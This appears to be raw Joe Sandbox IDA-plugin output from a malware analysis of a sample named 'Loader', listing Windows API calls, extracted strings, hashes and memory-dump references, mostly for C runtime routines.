                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: 0*+$CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-681192781
                                                                                      • Opcode ID: 6eeb4a0a0bcb01d8e98071a13463797d2f49d0dcdfd8cfad000a0ba0abd35182
                                                                                      • Instruction ID: a441587c1e550c601248271dafc6c5570d384cdb6844b81f6bec1615d2b62caa
                                                                                      • Opcode Fuzzy Hash: 6eeb4a0a0bcb01d8e98071a13463797d2f49d0dcdfd8cfad000a0ba0abd35182
                                                                                      • Instruction Fuzzy Hash: 4B01A731AA4656EFDB129F54DC49FEEB7B8FB05B51F000126E811A6690DBB49C10CA40
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002B6A66
                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 002B6A74
                                                                                      • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 002B6A85
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                      • API String ID: 667068680-1047828073
                                                                                      • Opcode ID: 64aa3bf94088d2146a407e543d241479ac0af04c2fc595ac06ababee9721af57
                                                                                      • Instruction ID: 309ad000c46263ebd0f7f6ec5ed1f895067efd37c55d5d080c0e25c54c8b3bd6
                                                                                      • Opcode Fuzzy Hash: 64aa3bf94088d2146a407e543d241479ac0af04c2fc595ac06ababee9721af57
                                                                                      • Instruction Fuzzy Hash: 93D0C7355E12505FE710EFB07D4D8D53BD5EA0AB113068577F445DA350EBB409258B91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 40582c8549e7edb4810c43818b83db180bd04dadb35d007d7e811cb37e7309a6
                                                                                      • Instruction ID: 06f34bb924b0074be346da55ebb07338287e056f71b68489547374eaac90becc
                                                                                      • Opcode Fuzzy Hash: 40582c8549e7edb4810c43818b83db180bd04dadb35d007d7e811cb37e7309a6
                                                                                      • Instruction Fuzzy Hash: D5B10270E2424AAFDB11DF98D8C1BAD7BB0AF45304F14425BE904AB3A2D7709D61CF65
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,002C105E,002B7150,002B388F,BB40E64E,?,?,?,?,002D2FDF,000000FF,?,002A9085), ref: 002C1075
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002C1083
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002C109C
                                                                                      • SetLastError.KERNEL32(00000000,?,002C105E,002B7150,002B388F,BB40E64E,?,?,?,?,002D2FDF,000000FF,?,002A9085), ref: 002C10EE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: 20f4914e222f03609946f622d685d2b763911f986a62cb140c19a456f7a0f4ec
                                                                                      • Instruction ID: f85e7d237785618f6f48cc31393508b78b9bec04ed75ae73722c979faa0500cd
                                                                                      • Opcode Fuzzy Hash: 20f4914e222f03609946f622d685d2b763911f986a62cb140c19a456f7a0f4ec
                                                                                      • Instruction Fuzzy Hash: 0801B5331782D25EA6242AB57CCEF6B2B94DF177B4720433DF914494F2EE5148B29A80
                                                                                      APIs
                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 002C1A0D
                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 002C1C86
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallUnexpectedtype_info::operator==
                                                                                      • String ID: csm$csm$csm
                                                                                      • API String ID: 2673424686-393685449
                                                                                      • Opcode ID: a30b1c4f209990e8a993ef597e52b0239d95a172aed12ddd52d3c846fc054e5c
                                                                                      • Instruction ID: dc02b607f3d6ef807cc06055a1773860b2e4c777e57c0edc427d46cf38836187
                                                                                      • Opcode Fuzzy Hash: a30b1c4f209990e8a993ef597e52b0239d95a172aed12ddd52d3c846fc054e5c
                                                                                      • Instruction Fuzzy Hash: BBB14A7182020ADFCF28DFA4C882FAEB7B5AF16314B14465EE8156B212D371DA71CF95
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526620683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID: @FrK$@IG@$O$|ALH
                                                                                      • API String ID: 3664257935-3271044971
                                                                                      • Opcode ID: 77d7db0ef69e4ce8d51c63679926fa2f1e735ce4722d72d25ad150f2fbb4058d
                                                                                      • Instruction ID: 100ef97d44ee28df1cc260658387d4dab923bee4a46e3698bd12abd1d6110507
                                                                                      • Opcode Fuzzy Hash: 77d7db0ef69e4ce8d51c63679926fa2f1e735ce4722d72d25ad150f2fbb4058d
                                                                                      • Instruction Fuzzy Hash: 505179725083904FE3218B3ADC5176BBFC2EFD2304F28895DE5E55B392DA7885068B96
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustPointer
                                                                                      • String ID: 0*+
                                                                                      • API String ID: 1740715915-419236330
                                                                                      • Opcode ID: 88f178866ea3159ec78cb4443eaa326dd04e776045919984a2d085dcfca8774b
                                                                                      • Instruction ID: 3227de9a4bfd83deb50f434fdc9592ee82a5adb1a6c2fd9ac80f74e9656b7a2f
                                                                                      • Opcode Fuzzy Hash: 88f178866ea3159ec78cb4443eaa326dd04e776045919984a2d085dcfca8774b
                                                                                      • Instruction Fuzzy Hash: 5051E571A21202DFDB298F14D987FA9B7A8EF52340F24422DE85647292D731EC75CF90
                                                                                      APIs
                                                                                      • __EH_prolog3.LIBCMT ref: 002B5681
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 002B568B
                                                                                        • Part of subcall function 002A3D50: std::_Lockit::_Lockit.LIBCPMT ref: 002A3D7E
                                                                                        • Part of subcall function 002A3D50: std::_Lockit::~_Lockit.LIBCPMT ref: 002A3DA9
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 002B56FC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                      • String ID: |.$0*+
                                                                                      • API String ID: 1383202999-2553041580
                                                                                      • Opcode ID: 8654e6dbe85992722d5dfff09b1c8aa82c58a9ab207c3365b99286e386740bcb
                                                                                      • Instruction ID: e6547952f60da687acb6bb7b5b55d56087f2e984a0c789e3fb57690d3609aa21
                                                                                      • Opcode Fuzzy Hash: 8654e6dbe85992722d5dfff09b1c8aa82c58a9ab207c3365b99286e386740bcb
                                                                                      • Instruction Fuzzy Hash: 8F01C03193062ADFCB05EFA4D8496FDB775AF84350F640509F410AB291CF749E258F91
                                                                                      APIs
                                                                                      • __alloca_probe_16.LIBCMT ref: 002C3A4F
                                                                                      • __alloca_probe_16.LIBCMT ref: 002C3B18
                                                                                      • __freea.LIBCMT ref: 002C3B7F
                                                                                        • Part of subcall function 002C2291: HeapAlloc.KERNEL32(00000000,002C4215,?,?,002C4215,00000220,?,?,?), ref: 002C22C3
                                                                                      • __freea.LIBCMT ref: 002C3B92
                                                                                      • __freea.LIBCMT ref: 002C3B9F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1096550386-0
                                                                                      • Opcode ID: 5bc8404dd043d38e745665cf31bd25973ed44c6999f62ed10bbf8944f2e1dc11
                                                                                      • Instruction ID: 53f8e9f982ede2b954604c707c24ba002291d9fef4bf67a967451c6204d5e0c3
                                                                                      • Opcode Fuzzy Hash: 5bc8404dd043d38e745665cf31bd25973ed44c6999f62ed10bbf8944f2e1dc11
                                                                                      • Instruction Fuzzy Hash: DF51C372620206AFEB20DE658C89FBB37A9DF44714B158A2DFD04D6101EB70DE70DA60
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 002B5CF5
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,?,002AB43E), ref: 002B5D14
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,002AB43E), ref: 002B5D42
                                                                                      • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,002AB43E), ref: 002B5D9D
                                                                                      • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,002AB43E), ref: 002B5DB4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AcquireExclusiveLock$CurrentThread
                                                                                      • String ID:
                                                                                      • API String ID: 66001078-0
                                                                                      • Opcode ID: 5f418ca06093d389e4efa9baec8fa61acc3be2cb0119e93876fa07fa848bb518
                                                                                      • Instruction ID: 7c660e248ee75d04ab382ca12a101d07b6113ecbb5f44e1492461b183dd0a318
                                                                                      • Opcode Fuzzy Hash: 5f418ca06093d389e4efa9baec8fa61acc3be2cb0119e93876fa07fa848bb518
                                                                                      • Instruction Fuzzy Hash: B8413634520E2BDBCB20CF64C488BEAB3F5FF08390B204A29E4568B540D730E9A5CF50
                                                                                      APIs
                                                                                        • Part of subcall function 002C24EA: GetLastError.KERNEL32(00000000,?,002C486D), ref: 002C24EE
                                                                                        • Part of subcall function 002C24EA: SetLastError.KERNEL32(00000000,?,?,00000028,002BEB13), ref: 002C2590
                                                                                      • GetACP.KERNEL32 ref: 002C6CD5
                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 002C6D0C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CodePageValid
                                                                                      • String ID: P.USA$utf8
                                                                                      • API String ID: 943130320-4222553367
                                                                                      • Opcode ID: b711bca9d3aeb9704f697c43e282e5159823f605c64dc012b8e7e5408b5f96c1
                                                                                      • Instruction ID: 923b89b33e4ce985dd39a54f5fafd73acdc20b655528107a55a6f6368b24de10
                                                                                      • Opcode Fuzzy Hash: b711bca9d3aeb9704f697c43e282e5159823f605c64dc012b8e7e5408b5f96c1
                                                                                      • Instruction Fuzzy Hash: 9151F675624707AADB24AF70CC4EFA673A8EF44700F14062EF9459B181F670EA709BA1
                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 002A35BD
                                                                                        • Part of subcall function 002A3D50: std::_Lockit::_Lockit.LIBCPMT ref: 002A3D7E
                                                                                        • Part of subcall function 002A3D50: std::_Lockit::~_Lockit.LIBCPMT ref: 002A3DA9
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 002A36D5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                      • String ID: (|.$0*+
                                                                                      • API String ID: 593203224-2881690827
                                                                                      • Opcode ID: c80d28a4a51e82238e0cb992b905c599700e6696e22b401147fa342309113775
                                                                                      • Instruction ID: ba86638ca54843bd17c193b0b88a18373283fdfcc310ae283741664af93b3ea3
                                                                                      • Opcode Fuzzy Hash: c80d28a4a51e82238e0cb992b905c599700e6696e22b401147fa342309113775
                                                                                      • Instruction Fuzzy Hash: 3F41B2B5E20249DFCB04DFA8D981AEDBBF4BF49750F104129E416A7390DB70AA14CFA5
                                                                                      APIs
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 002C17F5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___except_validate_context_record
                                                                                      • String ID: 0*+$csm$csm
                                                                                      • API String ID: 3493665558-1084059588
                                                                                      • Opcode ID: 84b45ee13521e61eeefad65eb0b6407db5778473253861d8bb17c803274c3b1f
                                                                                      • Instruction ID: 3ac1adad70792173c375088bc54e231e2360181524964fe855cb62a0f7387e02
                                                                                      • Opcode Fuzzy Hash: 84b45ee13521e61eeefad65eb0b6407db5778473253861d8bb17c803274c3b1f
                                                                                      • Instruction Fuzzy Hash: C331C335828256DBEF265F90CC42F6A7B69EF0A314B18475EF85449212C332CC72DB81
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID: 0*+$@$VirtualProtect
                                                                                      • API String ID: 190572456-3191760967
                                                                                      • Opcode ID: 2ffb873451b8dc42cfa5284d220937cbbf0f6933b10bd486c4d990f93e0b6280
                                                                                      • Instruction ID: 932f930a9d65b8bf0f05ab910825c9bc38c5b5d0cf305bd5993d48030f0370f4
                                                                                      • Opcode Fuzzy Hash: 2ffb873451b8dc42cfa5284d220937cbbf0f6933b10bd486c4d990f93e0b6280
                                                                                      • Instruction Fuzzy Hash: 9141E4B0D10209DFDB04DFA9E59869EBBF0FF48358F10842AE848AB350D7759954CF91
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,002CD20C,?,?,00000000,?,?,?,002CD0CA,00000002,FlsGetValue,002D81E4,002D81EC), ref: 002CD17D
                                                                                      • GetLastError.KERNEL32(?,002CD20C,?,?,00000000,?,?,?,002CD0CA,00000002,FlsGetValue,002D81E4,002D81EC,?,?,002C1088), ref: 002CD187
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,000000FF,?,002A9085), ref: 002CD1AF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID: api-ms-
                                                                                      • API String ID: 3177248105-2084034818
                                                                                      • Opcode ID: a25e4c953248a3c2a8aa91b0355610d1f2442f44e020e30d14eb46903f316108
                                                                                      • Instruction ID: 24e3ec738747f0a0e3c4d1a420ee4df6c177b03a2777c6a66edb2dfce2f9fe53
                                                                                      • Opcode Fuzzy Hash: a25e4c953248a3c2a8aa91b0355610d1f2442f44e020e30d14eb46903f316108
                                                                                      • Instruction Fuzzy Hash: 24E01A70290245BBFB202F65EC4AF2D3BA5AB10B84F184534FA0CA80E1D7B298718944
                                                                                      APIs
                                                                                      • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 002CA2A1
                                                                                        • Part of subcall function 002C23A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002C3B75,?,00000000,-00000008), ref: 002C2402
                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002CA4F3
                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 002CA539
                                                                                      • GetLastError.KERNEL32 ref: 002CA5DC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                      • String ID:
                                                                                      • API String ID: 2112829910-0
                                                                                      • Opcode ID: 43a652a590f183687bc331d1339c5c0d953f874083fa3c5a9666d6e9cbd76352
                                                                                      • Instruction ID: d46219f63cd13ec1652f651f756a08aaf3ec29093d3b3d643b9fc46c10b6ac79
                                                                                      • Opcode Fuzzy Hash: 43a652a590f183687bc331d1339c5c0d953f874083fa3c5a9666d6e9cbd76352
                                                                                      • Instruction Fuzzy Hash: 0CD179B5D1028C9FCB15CFA8D884AADBBB5FF08314F24826EE856EB251D630A951CF51
                                                                                      APIs
                                                                                        • Part of subcall function 002C23A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002C3B75,?,00000000,-00000008), ref: 002C2402
                                                                                      • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 002C80CA
                                                                                      • __dosmaperr.LIBCMT ref: 002C80D1
                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 002C810B
                                                                                      • __dosmaperr.LIBCMT ref: 002C8112
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3526372620.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3526334826.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526419252.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526456148.00000000002E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3526516723.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1913693674-0
                                                                                      • Opcode ID: e6ac4d2cc4bcbf5148db8fb56eee4447c0bef510e0d5b2db15b696bff2e196eb
                                                                                      • Instruction ID: 6917be0d06c2669e54a2898b58f7a80a5105972e4f9e2e659392a02ae8e35cb5
                                                                                      • Opcode Fuzzy Hash: e6ac4d2cc4bcbf5148db8fb56eee4447c0bef510e0d5b2db15b696bff2e196eb
                                                                                      • Instruction Fuzzy Hash: E621B831620216AF9B20AF61C881EAB77E9EF05364714CA1CF91997110EB71EC608F51
                                                                                      Memory Dump Source
